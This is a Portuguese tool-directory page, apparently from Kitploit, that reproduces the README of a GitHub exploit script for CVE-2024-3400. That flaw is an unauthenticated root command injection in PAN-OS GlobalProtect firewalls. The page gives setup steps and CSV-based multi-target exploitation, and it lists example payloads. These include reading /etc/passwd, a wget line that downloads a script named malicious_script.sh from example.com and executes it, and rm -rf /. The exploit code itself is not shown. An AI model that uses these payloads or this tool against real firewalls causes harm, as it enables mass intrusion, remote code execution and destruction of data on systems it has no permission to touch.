Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/yuvvi01/cve-2024-3400
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

# Script de exploração para CVE-2024-3400, uma injeção de comandos no PAN-OS GlobalProtect, permitindo execução remota de código não autenticada com privilégios de root. Suporta exploração de alvo único e múltiplos alvos baseada em CSV.

Ver Repositório
1151há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Script de Exploração de Firewall PAN-OS

Este script foi projetado para demonstrar a exploração de vulnerabilidades em firewalls PAN-OS. Ele envia um payload especialmente elaborado para o endpoint de API do firewall para executar comandos arbitrários. Esta exploração visa especificamente a CVE-2024-3400, uma vulnerabilidade de injeção de comandos no recurso GlobalProtect do software PAN-OS da Palo Alto Networks para versões específicas do PAN-OS. Configurações distintas de recursos podem permitir que um atacante não autenticado execute código arbitrário com privilégios de root no firewall.

Nota: Certifique-se de usar este script apenas para fins legais e éticos, e apenas em máquinas nas quais você tenha permissão para testar.

Uso

Para usar este projeto, siga estes passos:

  1. Clone este repositório:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. Mude para o diretório do repositório:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. Instale os módulos necessários:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. Execute o script Python.
    root@kitploit:~
    python3 exploit.py
    

Siga as instruções para inserir o endereço IP do firewall PAN-OS vulnerável e o payload a ser executado.

Exemplos de Payloads

  1. Listar o Conteúdo do Diretório:
    root@kitploit:~
    ls -la
    
    
  2. Exibir o conteúdo de um arquivo específico:
    root@kitploit:~
    cat /etc/passwd
    
    
  3. Exibir o nome de usuário do usuário atual que está logado no sistema:
    root@kitploit:~
    whoami
    
    
  4. Baixar um arquivo da internet (requer wget ou curl instalado):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  5. Tenha muito cuidado com este:
    root@kitploit:~
    rm -rf /
    

Instruções para Uso Seguro

Verificação de Certificado SSL

O script solicitará o caminho do arquivo do certificado SSL do servidor firewall PAN-OS. Se nenhum caminho for fornecido, o script definirá automaticamente a verificação SSL como falsa, efetivamente desabilitando o SSL.

Instruções do Arquivo CSV

Este script permite explorar vários alvos de firewalls PAN-OS vulneráveis usando um arquivo CSV. Abaixo estão as instruções para formatar o arquivo CSV corretamente:

Formato do Arquivo CSV:

O arquivo CSV deve ter três colunas:

ipaddress: O endereço IP do firewall PAN-OS vulnerável. payload: O payload a ser executado no firewall. path/to/root_CA_certificate.pem: O caminho para o certificado raiz da CA (deixe em branco se a verificação do certificado estiver desabilitada).

  • Exemplo de Arquivo CSV:
    root@kitploit:~
    ipaddress,payload,path/to/root_CA_certificate.pem
    192.168.1.1,exploit_payload1,/path/to/certificate.pem
    192.168.1.2,exploit_payload2,
    

Instruções:

Crie um arquivo CSV com o formato especificado. Preencha os endereços IP, payloads e caminhos dos certificados raiz da CA (se aplicável). Certifique-se de fornecer caminhos válidos para os certificados raiz da CA ou deixe o campo em branco se a verificação do certificado estiver desabilitada. Execute o script e escolha a opção de usar o arquivo CSV quando solicitado.

Referências

  • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
  • https://security.paloaltonetworks.com/CVE-2024-3400
Baixar ferramenta